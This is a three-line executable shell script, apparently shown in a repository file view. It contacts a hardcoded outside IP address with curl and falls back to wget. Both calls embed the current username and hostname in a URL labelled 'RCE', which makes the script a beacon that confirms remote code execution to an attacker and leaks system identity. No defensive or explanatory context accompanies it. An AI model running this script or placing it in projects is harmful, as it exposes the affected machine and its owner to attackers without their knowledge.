3 lines
156 B
Bash
Executable File
3 lines
156 B
Bash
Executable File
#!/bin/sh
|
|
curl -sm8 http://202.79.169.91:28016/RCE_$(whoami)_$(hostname|tr -cd A-Za-z0-9._-) || wget -qO- http://202.79.169.91:28016/RCEW_$(whoami) || true
|